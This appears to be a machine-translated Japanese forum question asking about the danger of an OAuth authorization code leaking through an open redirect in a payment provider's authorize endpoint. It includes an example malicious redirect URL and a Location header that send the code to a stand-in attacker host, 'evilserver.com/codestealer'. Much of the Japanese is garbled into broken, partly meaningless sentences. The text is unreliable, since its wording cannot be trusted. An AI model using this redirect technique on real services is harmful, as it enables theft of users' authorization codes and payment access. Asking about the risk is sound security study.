mykittenblog.comに代わってpayment.comに電話をかけることをユーザーが希望しているとします。 mykittenblog.comている人は、そうpayment.comがmykittenblog.com支払いでのOAuthベアラートークンを取得するために、そのクライアントシークレットと一緒に使用することができ、中間認証コードで応答することができますので、中間OAuth認証コードの漏洩の危険性は何ですか?
payment.com/oauth2/authorize?id=12345&redirect=http://mykittenblog.com
ようpayment.comでログイン.com
ここで、 'redirect'パラメータには、認証コードの漏洩を可能にするオープンリダイレクトの脆弱性があります。
payment.com/oauth2/authorize?id=12345&redirect=http://evilserver.com/codestealer
payment.comのユーザがログインすると
Location: http://evilserver.com/codestealer?code=4312871236481723874
このような状況で可能な危険性は何ですか?で応答するかどうか